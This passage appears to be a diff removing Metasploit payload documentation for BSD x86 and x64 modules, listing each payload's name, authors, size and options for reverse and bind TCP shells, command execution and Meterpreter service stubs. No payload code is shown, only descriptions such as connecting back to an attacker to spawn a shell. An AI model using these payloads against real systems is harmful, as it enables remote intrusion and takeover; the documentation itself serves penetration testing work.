||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,47 +0,0 @@
|
||||
|
||||
Name: BSD x64 Shell Reverse TCP
|
||||
Module: payload/bsd/x64/shell_reverse_tcp
|
||||
Platform: BSD
|
||||
Arch: x64
|
||||
Needs Admin: No
|
||||
Total size: 98
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
nemo <nemo@felinemenace.org>
|
||||
joev <joev@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CMD /bin/sh yes The command string to execute
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Connect back to attacker and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,45 +0,0 @@
|
||||
|
||||
Name: BSD x64 Command Shell, Reverse TCP Inline
|
||||
Module: payload/bsd/x64/shell_reverse_tcp_small
|
||||
Platform: BSD
|
||||
Arch: x64
|
||||
Needs Admin: No
|
||||
Total size: 81
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Connect back to attacker and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,35 +0,0 @@
|
||||
|
||||
Name: BSD Execute Command
|
||||
Module: payload/bsd/x86/exec
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 16
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
snagg <snagg@openssl.it>
|
||||
argp <argp@census-labs.com>
|
||||
joev <joev@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CMD yes The command string to execute
|
||||
|
||||
Description:
|
||||
Execute an arbitrary command
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,49 +0,0 @@
|
||||
|
||||
Name: FreeBSD Meterpreter Service, Bind TCP
|
||||
Module: payload/bsd/x86/metsvc_bind_tcp
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 0
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
hdm <x@hdm.io>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
Description:
|
||||
Stub payload for interacting with a Meterpreter Service
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,56 +0,0 @@
|
||||
|
||||
Name: FreeBSD Meterpreter Service, Reverse TCP Inline
|
||||
Module: payload/bsd/x86/metsvc_reverse_tcp
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 0
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
hdm <x@hdm.io>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Stub payload for interacting with a Meterpreter Service
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,45 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Bind TCP Stager (IPv6)
|
||||
Module: payload/bsd/x86/shell/bind_ipv6_tcp
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 63
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
skape <mmiller@hick.org>
|
||||
vlad902 <vlad902@gmail.com>
|
||||
hdm <x@hdm.io>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
Description:
|
||||
Spawn a command shell (staged).
|
||||
|
||||
Listen for a connection over IPv6
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,43 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Bind TCP Stager
|
||||
Module: payload/bsd/x86/shell/bind_tcp
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 54
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
skape <mmiller@hick.org>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
Description:
|
||||
Spawn a command shell (staged).
|
||||
|
||||
Listen for a connection
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,38 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Find Tag Stager
|
||||
Module: payload/bsd/x86/shell/find_tag
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 40
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
skape <mmiller@hick.org>
|
||||
|
||||
Description:
|
||||
Spawn a command shell (staged).
|
||||
|
||||
Use an established connection
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
TAG qFGA yes The four byte tag to signify the connection.
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,53 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Reverse TCP Stager (IPv6)
|
||||
Module: payload/bsd/x86/shell/reverse_ipv6_tcp
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 81
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
skape <mmiller@hick.org>
|
||||
vlad902 <vlad902@gmail.com>
|
||||
hdm <x@hdm.io>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
SCOPEID 0 no IPv6 scope ID, for link-local addresses
|
||||
|
||||
Description:
|
||||
Spawn a command shell (staged).
|
||||
|
||||
Connect back to the attacker over IPv6
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,50 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Reverse TCP Stager
|
||||
Module: payload/bsd/x86/shell/reverse_tcp
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 43
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
skape <mmiller@hick.org>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Spawn a command shell (staged).
|
||||
|
||||
Connect back to the attacker
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,38 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Bind TCP Inline
|
||||
Module: payload/bsd/x86/shell_bind_tcp
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 73
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Ramon de C Valle <rcvalle@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
Description:
|
||||
Listen for a connection and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,40 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Bind TCP Inline (IPv6)
|
||||
Module: payload/bsd/x86/shell_bind_tcp_ipv6
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 87
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
skape <mmiller@hick.org>
|
||||
vlad902 <vlad902@gmail.com>
|
||||
hdm <x@hdm.io>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
Description:
|
||||
Listen for a connection and spawn a command shell over IPv6
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,37 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Find Port Inline
|
||||
Module: payload/bsd/x86/shell_find_port
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 60
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Ramon de C Valle <rcvalle@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CPORT 35777 no The local client port
|
||||
|
||||
Description:
|
||||
Spawn a shell on an established connection
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,33 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Find Tag Inline
|
||||
Module: payload/bsd/x86/shell_find_tag
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 70
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
skape <mmiller@hick.org>
|
||||
|
||||
Description:
|
||||
Spawn a shell on an established connection (proxy/NAT safe)
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
TAG T2v6 yes The four byte tag to signify the connection.
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,45 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Reverse TCP Inline
|
||||
Module: payload/bsd/x86/shell_reverse_tcp
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 64
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Ramon de C Valle <rcvalle@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Connect back to attacker and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
